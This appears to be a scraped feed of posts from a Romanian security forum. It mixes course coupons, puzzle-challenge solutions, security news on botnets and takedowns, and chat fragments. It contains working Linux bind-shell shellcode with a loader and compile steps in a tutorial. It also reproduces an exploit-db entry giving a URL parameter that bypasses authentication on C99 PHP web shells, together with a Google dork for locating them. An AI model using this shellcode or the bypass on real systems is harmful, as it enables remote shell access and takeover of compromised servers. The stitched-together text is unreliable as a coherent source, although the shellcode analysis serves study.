Usr6

https://www.mediafire.com/folder/5xks9ksoz8k73/ Sursa: https://evilzone.org/ebooks/ebooks-for-beginners/msg81046/#msg81046

CSS322, Semester 2, 2013, Lectures at Sirindhorn International Institute of Technology, Thammasat University, Thailand by Steven Gordon. Course material via: Teaching | Steven Gordon Introduction to Security and Cryptography (CSS322, Lecture 1, 2013) 59:26 Introduction to Encryption Techniques (CSS322, Lecture 2, 2013) 1:21:39 More Classical Ciphers (CSS322, Lecture 3, 2013) 1:17:37 Simplified DES Example (CSS322, Lecture 5, 2013) 44:19 Block Cipher Concepts (CSS322, Lecture 4, 2013) 1:20:20 DES Design and Meet-in-the-Middle Attack on Double DES (CSS322, Lecture 6, 2013) 1:25:01 Pseudo Random Number Generators (CSS322, Lecture 7, 2013) 1:05:35 Stream Ciphers and Number Theory (CSS322, Lecture 8, 2013) 1:19:36 Number Theory (CSS322, Lecture 9, 2013) 1:03:39 RSA Details (CSS322, Lecture 11, 2013) 1:10:43 Public Key Cryptography and RSA (CSS322, Lecture 10, 2013) 1:19:54 Breaking RSA (CSS322, Lecture 12, 2013) 36:43

Rezolvare Nivelul 1: Fisierul gif trebuia deschis intr-un hex/text editor, la finalul lui se gasea un link pentru descarcarea unei arhive: 0002a2c0h: 07 52 7F 42 D8 97 C0 82 78 CC 90 40 40 00 3B 68 ; .RBØ—À‚xÌ@@.;h 0002a2d0h: 74 74 70 73 3A 2F 2F 77 77 77 2E 73 65 6E 64 73 ; ttps://www.sends 0002a2e0h: 70 61 63 65 2E 63 6F 6D 2F 66 69 6C 65 2F 77 71 ; pace.com/file/wq 0002a2f0h: 35 6A 75 77 ; 5juw 0, 1, 1, 2, 3, 5, 8... adica "fibonacci", parola arhivei Nivelul 2: indiciu: in continuare... text criptat: owbhoqfwqvebmbrlfovsijaweysndajltahmlsmkjayvkqotjaqpkguxwmakfxybiajilxhcxopalesftjulthuoniitmuqntkjvzlubflapsykucgfheuwsqsqmicrjkskmcfhsblzltpoeobvorxfgsvwqoeexycnzuimhlxpkgzfxpoowbhggpfdekexzvgtyeoyqxcvlgahcltzlgbjghkvlcjonmfjtgoyml "in continuare..." = continuarea sirului fibonacci anterior: 13, 21, 34, 55, 89, 144, 233 owbhoqfwqvebmbrlfovsijaweysndajltahmlsmkjayvkqotjaqpkguxwmakfxybiajilxhcxopalesftjulthuoniitmuqntkjvzlubflapsykucgfheuwsqsqmicrjkskmcfhsblzltpoeobvorxfgsvwqoeexycnzuimhlxpkgzfxpoowbhggpfdekexzvgtyeoyqxcvlgahcltzlgbjghkvlcjonmfjtgoyml miaunel=parola de acces la nivelul 3 Nivelul 3: Indicii: 5x5 1 6 2 11 7 3 16 12 8 4 etc. Indicii suplimentare: 5x5 = 5*5= 25 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 text criptat: m adbtaalz r aaraznaigueu adica: matza blan da zg araie rauu solutia challenge-ului era: "matza blanda zgaraie rauu" Au rezolvat challenge-ul: @gio33 Felicitari celor care au reusit sa dezlege misterul cotoiului dansator

A Bloomberg Businessweek report has revealed that the CIA, NSA, and other agencies spent months investigating a major malware attack on Nasdaq, revealing the stock exchange service's vulnerability. In 2010, the FBI picked up hints that an intruder had compromised Nasdaq's central servers. After looking closer, experts realized that the malware wasn't meant for surveillance — it was potentially capable of disrupting trading or even, in the NSA's initial opinion, "wiping out the entire exchange." While Nasdaq had apparently detected some kind of problem, it had not reported it, and government investigators found a mess of earlier, apparently undetected intrusions. "Agents found the tracks of several different groups operating freely, some of which may have been in the exchange's networks for years," says Businessweek. And "basic records of the daily activity occurring on the company's servers, which would have helped investigators trace the hackers' movements, were almost nonexistent." From what the NSA's intelligence could detect, the malware was the work of a government, not independent hackers. A similar strain of malware had been designed by the Russian FSB, but it was also possible it had been used by another country — China was a primary suspect — for both its intrinsic features and its ability to confuse an investigation. Rep. Mike Rogers (R-MI) officially confirmed an attack in broad terms. "We've seen a nation-state gain access to at least one of our stock exchanges, I'll put it that way, and it's not crystal clear what their final objective is," he said. "The bad news of that equation is, I'm not sure you will really know until that final trigger is pulled. And you never want to get to that." But politics also make it hard to determine what happened. According to Businessweek, some officials believed the NSA may have played up the danger of the attack and the connection to Russia. Then-head Keith Alexander was a strong proponent of increasing the US cyberwarfare force; years later, he pushed for stronger legal authority in order to prevent something like a "cyberpacket that's going to destroy Wall Street." Rogers, a notably hawkish member of Congress, would also be likely to take the attack as seriously as possible. Later analysis of the malware indicated that although it could disrupt the stock market, it couldn't wipe a network. After the CIA conducted its own investigation, the White House reportedly began to consider it an attempt at financial crime, not terrorism. But Businessweek, which previously conducted an in-depth investigation on the Target system hack, says that the situation is still extremely murky four years later. If it was the work of the Russian government, many unanswered questions remain, especially why it was found during a period when relations were friendlier than usual. Unfortunately, Nasdaq's apparent lack of comprehensive records could make answers impossible to find. Update and correction July 17th, 1:30PM ET: Nasdaq spokesperson Joe Christinat says that the malware did not reach the stock exchange, as originally stated in the headline. "The events of four years ago, while sensationalized by Businessweek, only confirm what we have said — that none of Nasdaq's trading platforms or engines were ever compromised and no evidence of exfiltration exists from Directors Desk." Sursa: Russian malware infiltrated the Nasdaq servers, says*Businessweek | The Verge

Sucuri " This vulnerability was discovered by the Romanian Security Team (RST), so it could already be used in the wild on 0-day attacks. If you can’t patch vBulletin, we recommend blocking access to the memberlist page in the mean time. "

Android Programming for Newbies Start your way into Android Development without any programming knowledge https://www.udemy.com/android-app-programming/?couponCode=APINTRO

Yesterday, an international organised cybercrime network, composed mostly of Romanian citizens, was successfully taken down in Romania(1) and France(2) with the support of the European Cybercrime Centre (EC3) at Europol. The cybercrime network is suspected of sophisticated electronic payment crimes including intrusions into international non-cash payment systems (through malware attacks), illegal worldwide financial transactions and money transfers, card data compromising (via skimming attacks), money laundering and drug trafficking. Members of this criminal network were using malware – RAT (Remote Access Tool) with key logger functionality - to take over and gain access to computers used by money transfer services all over Europe (Austria, Belgium, Germany, Norway, UK). More than 115 individuals were interrogated and 65 detained in coordinated raids by Romanian and French law enforcement and judicial authorities, supported on the spot by the European Cybercrime Centre (EC3). Large sums of money, luxury vehicles, IT equipment and variety of evidence were seized during the raids. Around 450 police officers were deployed to execute 117 house search warrants during the operation. Losses incurred by the criminals' activities are estimated to be at least two million euros. The proceeds of their crimes were invested in different types of property, deposited in bank accounts or transferred electronically to hide their illicit origin. The Head of the European Cybercrime Centre (EC3), Troels Oerting, said: "As a direct result of the excellent cooperation and outstanding work by police officers and prosecutors from Romania, France and other European countries, a key criminal network has been successfully taken down this week. EC3's role was to effectively facilitate international cooperation, including the exchange of intelligence, and to provide resources where needed. After many months and a great effort from all involved, many individuals have now been detained after key locations were identified and targeted by law enforcement. The resounding success of such an operation is not the first and will not be the last, as police officers and prosecutors, alongside EC3, continue in their tireless endeavours to make payment transactions safer for customers throughout Europe and beyond." Operations such as this one demonstrate the crucial role of exchanging intelligence through Europol channels and the importance of international coordination at different operational stages including the final execution at European level. EC3 organised several operational meetings at Europol headquarters in The Hague, provided analysis, and simultaneously deployed mobile offices and technical support on the spot in the cooperating countries. (1) Directorate for Investigating Organized Crime and Terrorism (DIICOT) from Craiova city; Romanian National Police, including the Brigade for Combating Organized Crime from Craiova city, the Service of Intelligence & Internal Protection from Craiova and the National Intelligence Service (2) Judicial French Police (BFMP DPJ) – Brigade of Combating Payment Fraud in Paris Sursa: https://www.europol.europa.eu/content/international-network-romanian-cybercriminals-dismantled

CyberGhost on WindowsDeal | CyberGhost VPN sau: CyberGhost 5 Premium VPN (100% Discount) Deal Expires in: 2 day(s) 9 hour(s) 9min(s)

Catia V5 Essentials: In these series you will learn how to use Catia v5 (one of the most powerful design and analysis tools available) to design simple or complex parts, assemble them, simulate different parameters and variables to see how your part will act in normal and critical situations and more. You will learn advanced use of Catia in certain industries in the second part of these lessons. https://www.udemy.com/catia-v5-essentials/?couponCode=CATIA-V5-100

indiciu suplimentar: 5x5 = 5*5= 25 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 Raspunsul nivelului 3 este in legatura stransa cu dansatorul din poza.

Challenge de duminica: Download: https://www.sendspace.com/file/yj7dda Indiciu 0: poate nu se vede din prima, dar, exista Indiciu 1: ai invatat la scoala, sau... ar fi trebuit... p.s.: toate parolele incep cu litera mica p.s.2: nu va complicati inutil

WTF is a bind shell? Before starting this exercise, my understanding of a bind shell was the following: it is a socket that allows you to send commands to a program and receive the responses over a network. This is not very helpful when trying to build your own except that you think you need a socket, port and an executable. Instead of guessing, lets take a look at some other bind shell shellcode and see what it does. Metasploit is far from the only way to get your hands on shellcode. There are several sites that host shellcode that you can use for yourself such as Exploit Database from Offensive Security, Project Shellcode from Ty Miller and Shell Storm from Jonathan Salwan. Lets grab a small bind shell from Shell Storm and see what it does. First, create a folder to place your working files in.1 mkdir bindshell Go to the following url and take a look at the content. It contains the content of a C file and instructions on how to compile and run it. http://shell-storm.org/shellcode/files/shellcode-836.php . /* Tiny Shell Bind TCP Shellcode - C Language Linux/x86 Written in 2013 by Geyslan G. Bem, Hacking bits http://hackingbits.com geyslan@gmail.com This source is licensed under the Creative Commons Attribution-ShareAlike 3.0 Brazil License. To view a copy of this license, visit http://creativecommons.org/licenses/by-sa/3.0/ You are free: to Share - to copy, distribute and transmit the work to Remix - to adapt the work to make commercial use of the work Under the following conditions: Attribution - You must attribute the work in the manner specified by the author or licensor (but not in any way that suggests that they endorse you or your use of the work). Share Alike - If you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one. */ /* tiny_shell_bind_tcp_shellcode * 73 bytes * null-free if the port is # gcc -m32 -fno-stack-protector -z execstack tiny_shell_bind_tcp_shellcode.c -o tiny_shell_bind_tcp_shellcode Testing # ./tiny_shell_bind_tcp_shellcode # nc 127.0.0.1 11111 */ #include <stdio.h> #include <string.h> unsigned char code[] = \ "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a" "\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68" "\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1" "\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd" "\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f" "\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" "\x41\xcd\x80"; main () { // When the Port contains null bytes, printf will show a wrong shellcode length. printf("Shellcode Length: %d\n", strlen(code)); // Pollutes all registers ensuring that the shellcode runs in any circumstance. __asm__ ("movl $0xffffffff, %eax\n\t" "movl %eax, %ebx\n\t" "movl %eax, %ecx\n\t" "movl %eax, %edx\n\t" "movl %eax, %esi\n\t" "movl %eax, %edi\n\t" "movl %eax, %ebp\n\t" // Setting the port "movw $0x672b, (code+20)\n\t" // Calling the shellcode "call code"); } This may look big and scary now but we’re only interested in seeing what it does so we can figure out how to write our own. Leave that page open for now, we’ll come back to it shortly. Create a file in your bindshell folder called shellcode.c cd bindshell nano shellcode.c Paste the following code into the shellcode.c file we just opened. #include<stdio.h> #include<string.h> unsigned char code[] = \ ""; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); } Now grab just the shellcode from the Shell Storm page and paste it into this new file ensuring the formatting looks like this. #include<stdio.h> #include<string.h> unsigned char code[] = \ "\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a" "\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68" "\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1" "\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd" "\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f" "\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" "\x41\xcd\x80"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); } Save and close the file CTRL + O <-- Save File {ENTER/RETURN KEY} <-- Accept the Filename CTRL X <-- Exit Great, we’ve just created a C file that will print our shellcode length and then run it. but before we can do that, we need to compile it into a binary file. To be able to compile this file, we need a compiler such as GCC (GNU Compiler Collection) which will turn our source code into a binary file. Assuming you’re running this on a Debian based distro such as Ubuntu, Kali Linux, BackTrack or your own distro, you can use Aptitude to install GCC sudo apt-get install gcc Because we’re going to compile shellcode often, lets create a script that we can reuse to compile our shellcode.c file. Create a new file called compile.sh and paste the following into it #!/bin/bash if [ -z "$1" ] then gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode else gcc -m32 -fno-stack-protector -z execstack $1.c -o $1 fi What this file will do is check to see if you have passed any argument to the script, if not it assumes that the file you want to compile is called “shellcode.c” which in this case is true. Then the script will run GCC with the following options: -m32 tells the compiler we're building this source code for a 32 bit operating system -fno-stack-protection will disable the stack protection mechanisms in GCC -z execstack will allow our stack to be executable shellcode.c is the file with the source code -o shellcode is the binary file we want to create with our source code Now we need to make this new script executable. chmod +x compile.sh That’s it, run the script and you should have a brand new binary that can create bind shells. ./compile.sh We’re not interested in running this binary right now, we’re only interested in finding out what it does. So lets take a look inside and see what this shellcode is doing. To do this, we are going to use a tool called “objdump“, part of Gnu Binary Utilities, which will look at our shellcode and show us what it’s doing. To install these tools run: sudo apt-get install binutils Now that we have objdump installed, lets disassemble our binary. objdump -D shellcode -M intel Wow, that is a lot of assembly code. The part we’re interested in is: 08049700 <code>: 8049700: 31 db xor ebx,ebx 8049702: f7 e3 mul ebx 8049704: b0 66 mov al,0x66 8049706: 43 inc ebx 8049707: 52 push edx 8049708: 53 push ebx 8049709: 6a 02 push 0x2 804970b: 89 e1 mov ecx,esp 804970d: cd 80 int 0x80 804970f: 5b pop ebx 8049710: 5e pop esi 8049711: 52 push edx 8049712: 66 68 2b 67 pushw 0x672b 8049716: 6a 10 push 0x10 8049718: 51 push ecx 8049719: 50 push eax 804971a: b0 66 mov al,0x66 804971c: 89 e1 mov ecx,esp 804971e: cd 80 int 0x80 8049720: 89 51 04 mov DWORD PTR [ecx+0x4],edx 8049723: b0 66 mov al,0x66 8049725: b3 04 mov bl,0x4 8049727: cd 80 int 0x80 8049729: b0 66 mov al,0x66 804972b: 43 inc ebx 804972c: cd 80 int 0x80 804972e: 59 pop ecx 804972f: 93 xchg ebx,eax 8049730: 6a 3f push 0x3f 8049732: 58 pop eax 8049733: cd 80 int 0x80 8049735: 49 dec ecx 8049736: 79 f8 jns 8049730 <code+0x30> 8049738: b0 0b mov al,0xb 804973a: 68 2f 2f 73 68 push 0x68732f2f 804973f: 68 2f 62 69 6e push 0x6e69622f 8049744: 89 e3 mov ebx,esp 8049746: 41 inc ecx 8049747: cd 80 int 0x80 8049749: 00 00 add BYTE PTR [eax],al We can see xor, push, pop, inc and some other functions but we still don’t really know the steps involved to create our own bind shell. Lets move onto something that will make this even easier to understand. Libemu is a x86 Shellcode Emulation tool that can make following and understanding shellcode much easier. Download and install libemu, following this procedure: Firstly, we’re going to need Git. If you don’t already have git installed, install it now sudo apt-get install git Once you have git installed, clone the libemu repo into your temp folder cd /tmp git clone git://git.carnivore.it/libemu.git You’ll also need some dependencies to get libemu installed and running1 sudo apt-get install build-essential autoconf libtool python-dev graphviz Now go into the libemu folder we cloned1 cd /tmp/libemu/ Run these commands to configure and build libemu autoreconf -v -i ./configure --enable-python-bindings --prefix=/opt/libemu sudo make install sudo ldconfig -n /opt/libemu/lib We should now have a libemu folder installed in /opt/libemu/ We now need to prepare our shellcode for libemu. Start by grabbing just the shellcode and place it in a file called shellcode.hex cat shellcode.hex \x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a \x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68 \x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1 \xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd \x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f \x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f \x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3 \x41\xcd\x80 Next, we’re going to create an alias called hex2raw. Add this line to your .bashrc file if you want this to be permanently available. alias hex2raw="tr -d '\\\x' | xxd -r -p" Now lets convert our hex code to raw code. cat shellcode.hex | hex2raw > shellcode.raw If all went well, you should have a new file called shellcode.raw We now have everything we need to see what this bind shell is doing, lets run libemu on this raw code cat shellcode.raw | /opt/libemu/bin/sctest -vvv -Ss 99999 -G shellcode.dot The last step is to convert the shellcode.dot graph into an image so we can view it dot -Tpng -o shellcode.png shellcode.dot Great, we now have a shellcode.png file, lets take a look at it EPIC, now we can see what this shellcode is doing a lot clearer and we can also see the system calls that it is making. We will use these to create our own bind shell shellcode. We can see that the first call being made is the socket call, followed by the bind call, then the listen and accept calls. Then the code loops through the dup2 call several times and finally execve is called. We finally have our bind shell process: 1. Socket 2. Bind 3. Listen 4. Accept 5. Dup2 6. Execve Sursa: part 1: disassembling and understanding shellcode - hacker for hire part 2: building the shellcode: part 2: building the shellcode - hacker for hire part 3: cleaning and optimising shellcode: part 3: cleaning and optimising shellcode - hacker for hire

# Exploit Title: C99 Shell Authentication Bypass via Backdoor # Google Dork: inurl:c99.php # Date: June 23, 2014 # Exploit Author: mandatory ( Matthew Bryant ) # Vendor Homepage: http://ccteam.ru/ # Software Link: https://www.google.com/ # Version: < 1.00 beta # Tested on:Linux # CVE: N/A All C99.php shells are backdoored. To bypass authentication add "?c99shcook[login]=0" to the URL. e.g. http://127.0.0.1/c99.php?c99shcook[login]=0 The backdoor: @extract($_REQUEST["c99shcook"]); Which bypasses the authentication here: if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if ($login_txt === false) { $login_txt = ""; } elseif (empty($login_txt)) { $login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html)); } header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } } For more info: [[url]http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/[/url] ~mandatory Sursa: http://www.exploit-db.com/exploits/34025/

iOS - professional mobile developer During this training you will create 3 advanced applications, that you can extend according your ideas! 1. Task Manager 2. Picasa Galery 3. Stargate Battle https://www.udemy.com/ios-professional-mobile-developer/?couponCode=iOS_free

The social networking giant has managed to take down a Greek botnet that used Facebook to spread malware and infected 250,000 computers to mine crypto-currencies, steal bitcoins, email passwords and banking details. Facebook is always one of the favourite weapon of cyber criminals, cyber thieves and scammers due to its popularity among other social media platforms. This social networking platform, with more than one billion active users, provides special opportunities for people to connect and share information, as well as also serves a great platform for malware developers and scammers. The botnet, dubbed as Lecpetex, was around from December 2013 to last month and compromised around 50,000 Facebook accounts at its peak, under which users would receive spam Facebook messages that would typically like "lol" with a zip archive attachment. Once the attachment is opened, it would execute an embedded Java archive file that would download Lecpetex main module and install a program to begin Litecoin mining secretly on the infected computer, and at the same time, other malware sent out from the botnet would steal bitcoins, email passwords and internet banking details. Moreover, the module would download and run the Facebook spamming module that would hijack user’s account by stealing cookies from their browser in an effort to gain access to the victim's Facebook friend list so that it could further send out more spam messages to each friend with a zip file containing malware. The Lecpetex botnet infect computers with family of different malware, including the DarkComet remote access trojan, through simple social engineering techniques, and the operators behind it were constantly modifying it in order to evade detection, both by Facebook's attachment scanning software as well as anti-virus software. Security researchers at Menlo Park said the 31 and 27 year-old botnet creators delivered over 20 distinct spam campaigns, affecting users in Greece, Poland, Norway, India, Portugal, and the US. Not even the malware targeted Facebook alone, the malware was also delivered through torrent files containing pirated content like movies, games and MP3s to trick unwitting downloaders, but this was not observed by Facebook bods. "On April 30, 2014, we escalated the Lecpetex case to the Cybercrime Subdivision of the Greek Police, and the agency immediately showed strong interest in the case," Facebook engineers wrote in an unauthored post. After five months of examination, irritated botnet creators began leaving messages for Facebook engineers from their command and control servers saying that: "Hello people.. but am not the f***ing zeus bot/skynet bot or whatever piece of sh*t.. no fraud here.. only a bit of mining. Stop breaking my ballz.." They also changed their crypto keys to the phrase 'IdontLikeLecpetexName'. But Facebook didn’t stop its investigation and continued to target botnet with new countermeasures and automated tools in order to extract more information from the botnet to trace its creators, and finally the Greek Police arrested two hackers last week, a 31-year-old and a 27-year-old who were both informatics students. "According to the Greek Police, the authors were in the process of establishing a Bitcoin 'mixing' service to help launder stolen Bitcoins at the time of their arrest," said Facebook. “Ultimately, remediating a threat like Lecpetex requires a combination of technical analysis capabilities, industry collaboration, agility in deploying new countermeasures, and law enforcement cooperation." The Greek Reporter says that the Lecpetex operation is the biggest case ever handled by Greece's Cyber Crime Unit. Sursa: Facebook Takes Down Bitcoin Stealing Botnet that Infected 250,000 Computers - The Hacker News

Meciul in reluare pe TVR1 la ora 11.00

din cauza ta si a altora ca tine a fost scos... (20:36:30) kempactick: ba ce vremuri cand se spama cu /motto (20:37:40) kempactick: eu va futeam cu spammu ))) (20:38:20) RST: Zatarra has been logged out (Timeout). (20:38:50) kempactick: em esti? (20:39:24) Byte-ul: apoi se spama cu rst regulament (20:39:25) Byte-ul: (20:39:43) kempactick: plm /motto nu se vedea.. (20:40:15) kempactick: se intrebau moderatorii care plm spama pana intr-o zis cand zatarea a scos motto (20:40:43) kempactick: mue bre cum sa scoti asa ceva?

FunCap.pdf Fuzzing and Patch Analysis - SAGEly Advice.pptx McSema.pdf Memory_Tracing_Forensic.pdf PANDA REcon.pdf PANDA REcon.zip Performing Open Heart Surgery on a Furby Recon RECON2014_OFLYNN.pdf Recon 2014 Skochinsky.pdf Recon14_HDD.pdf Reverse Engineering Flash Memory for Fun And Benefit The Making of the Kosher Phone.pdf Wartortell_Recon2014.pptx milan-REcon14 slides.pdf mjanus_recon.pptx pinpoint_control_for_analyzing_malware_recon2014 recon-2014-ossmann-hackrf.pdf reversing_on_the_edge_recon14_jspelman_jjones.pdf * ziele urmatoare e posibil sa apara si altele + video Index of /2014/slides/

Burning Studio 2014 Get your burning projects done – fast and simple! Music Studio 4 Your life, your music, your Music Studio! Snap 6 Screenshots and videos the easy way: Point, click, done! Your photos as greeting cards! WinOptimizer 2014 Optimal improvement, maintenance and adjustment of your Windows® system! Here’s how it works: Enter your download code here in order to activate the access to your gifts. Then download, install and use one or even all of the five Ashampoo full versions below – guaranteed free and unrestricted. Your personal Ashampoo® gift

Ethical Hacking for Beginners •Over 25 lectures and 4 hours of content! •You will learn Kali Linux OS •You will learn Metasploit framework •You will learn exploiting a vulnerability with Metasploit framework •You will learn Client Side Attacks •You will learn making trojan file •You will learn creating and managing a botnet •You will learn hiding trojan file from antivirus programs •You will learn detecting trojans in your systems •You will learn capturing network traffics •You will learn data mining from captured network traffics •You will learn Arp poisoning attack •You will learn Dns spoof attack https://www.udemy.com/ethical-hacking-for-beginners/?couponCode=FIRSTTIME

Un indiciu suplimentar pentru nivelul 3, parola = cheia de acces la acest nivel https://anonfiles.com/file/7817d6db8d6d7d38f47eb5596dfc2e03 inca un hint pentru nivelul 3: | |-| |-| | | | | | | | | | | | | | | | |_| |_| o

You will start with lessons for installing Ruby on PC, and how to run simple programs. This Ruby training video is designed for the absolute beginner, and no prior programming experience is necessary. Some of the topics the course covers in this video training are; working with data and variables, operators and expressions, decision making (if and case statements), loops, methods and functions and object-oriented programming. You will also learn about exception handling, reading and writing files, and working with the Ruby debugger. In completing this computer based training course for Ruby programming, you will have a solid foundation to allow you to start creating programs using Ruby. SECTION 1:Introduction SECTION 2:Ruby Basics SECTION 3:Ruby Literals SECTION 4:Float SECTION 5:Strings SECTION 6:Boolean SECTION 7:Variable Naming SECTION 8:Ruby Variable Declaration SECTION 9:Arrays & Ruby Arrays Read SECTION 10:Ruby Arrays Creation Example SECTION 11:Hash SECTION 12:Ruby Operators Intro and Type SECTION 13:Arithmetic operators SECTION 14:Boolean SECTION 15:Assignment operator SECTION 16:Exceptions https://www.udemy.com/ruby-programming-for-beginners/?couponCode=tintin

@staticwater si ceilalti care v-ati blocat la nivelul 3: Nu e doar "five or five" mai este si un animalut in poza, ar fi de folos daca ati stii modul de deplasare al acelui animalut (sa presupunem ca ar exista in realitate, ca ar fi viu si ar vrea sa se plimbe)

Indicii: 3 nivele, incepe clasic, daca pare complicat ai gresit abordarea Dificultate: accesibil oricarei persoane curioase cu notiuni de baza in it Tip: mister, istorie, criptografie poza poate fi descarcata de aici: https://anonfiles.com/file/6b6d2a6401cb71b463fd13e743542c65 Astept rezolvarea pe pm. //Au dezlegat secretul tracilor: @Alexander33

Millions of legitimate servers that rely on dynamic domain name services from No-IP.com suffered outages on Monday after Microsoft seized 22 domain names it said were being abused in malware-related crimes against Windows users. Microsoft enforced a federal court order making the company the domain IP resolver for the No-IP domains. Microsoft said the objective of the seizure was to identify and reroute traffic associated with two malware families that abused No-IP services. Almost immediately, end-users, some of which were actively involved in Internet security, castigated the move as heavy handed, since there was no evidence No-IP officially sanctioned or actively facilitated the malware campaign, which went by the names Bladabindi (aka NJrat) and Jenxcus (aka NJw0rm). "By becoming the DNS authority for those free dynamic DNS domains, Microsoft is now effectively in a position of complete control and is now able to dictate their configuration," Claudio Guarnieri, co-founder of Radically Open Security, wrote in an e-mail to Ars Technica. "Microsoft fundamentally swept away No-IP, which has seen parts of its own DNS infrastructure legally taken away." No-IP was no less critical of the move. In a statement that alleged damage to "millions of innocent users," company officials wrote: This morning, Microsoft served a federal court order and seized 22 of our most commonly used domains because they claimed that some of the subdomains have been abused by creators of malware. We were very surprised by this. We have a long history of proactively working with other companies when cases of alleged malicious activity have been reported to us. Unfortunately, Microsoft never contacted us or asked us to block any subdomains, even though we have an open line of communication with Microsoft corporate executives. We have been in contact with Microsoft today. They claim that their intent is to only filter out the known bad hostnames in each seized domain, while continuing to allow the good hostnames to resolve. However, this is not happening. Apparently, the Microsoft infrastructure is not able to handle the billions of queries from our customers. Millions of innocent users are experiencing outages to their services because of Microsoft’s attempt to remediate hostnames associated with a few bad actors. Had Microsoft contacted us, we could and would have taken immediate action. Microsoft now claims that it just wants to get us to clean up our act, but its draconian actions have affected millions of innocent Internet users. Vitalwerks and No-IP have a very strict abuse policy. Our abuse team is constantly working to keep the No-IP system domains free of spam and malicious activity. We use sophisticated filters and we scan our network daily for signs of malicious activity. Even with such precautions, our free dynamic DNS service does occasionally fall prey to cyberscammers, spammers, and malware distributors. But this heavy handed action by Microsoft benefits no one. We will do our best to resolve this problem quickly. In a blog post, Richard Domingues, assistant general counsel for the Microsoft digital crimes unit, said Microsoft pursued the seizure for No-IP's role "in creating, controlling, and assisting in infecting millions of computers with malicious software—harming Microsoft, its customers and the public at large." He added: "We're taking No-IP to task as the owner of infrastructure frequently exploited by cybercriminals to infect innocent victims with the Bladeabindi (NJrat) and Jenxcus (NJw0rm) family of malware." He went on to say: "As malware authors continue to pollute the Internet, domain owners must act responsibly by monitoring for and defending against cybercrime on their infrastructure. If free Dynamic DNS providers like No-IP exercise care and follow industry best practices, it will be more difficult for cybercriminals to operate anonymously and harder to victimize people online." Dynamic DNS providers are popular because they allow people to obtain a free subdomain—such as dangoodin.no-ip.org—that automatically maps to whatever IP address the user's computer is using at the moment. The mapping changes each time the user's IP address is updated. Such services are especially loved by online gamers and Linux user group members. The services can also be popular with criminals running command and control servers that manage large numbers of infected computers. According to Domingues, No-IP domains were used 93 percent of the time by Bladabindi and Jenxcus. In the past year alone, the two malware families have been detected by Microsoft more than 7.4 million times, a figure that doesn't include detections by competing anti-malware services. Microsoft has more about the malware here and here. In a complaint Microsoft filed under seal on June 19, Microsoft attorneys said No-IP is "functioning as a major hub for 245 different types of malware circulating on the Internet." The document said abuse of the service has been the subject of recent blog posts by both OpenDNS and Cisco Systems. "Although Defendant Vitalwerks is on notice and should be aware that its services are heavily abused, it has failed to take sufficient steps to correct, remedy, or prevent the abuse and to keep its domains free from malicious activity," the attorneys wrote. In addition to naming No-IP, the complaint also charged two men who allegedly used No-IP to work with Bladabindi and Jenxcus control servers. More documents filed in the case are available here. Monday's seizure was the tenth major malware disruption Microsoft has participated in. The actions typically combine surprise technical and legal procedures that eradicate or significantly disrupt major botnets. Generally, law-abiding Internet users benefit from the actions because they vastly reduce a form of crime that's extremely difficult to combat. The latest action, however, underscores the darker side of these legal procedures, as millions of legitimate users get caught in the crossfire. Sursa: Millions of dynamic DNS users suffer after Microsoft seizes No-IP domains | Ars Technica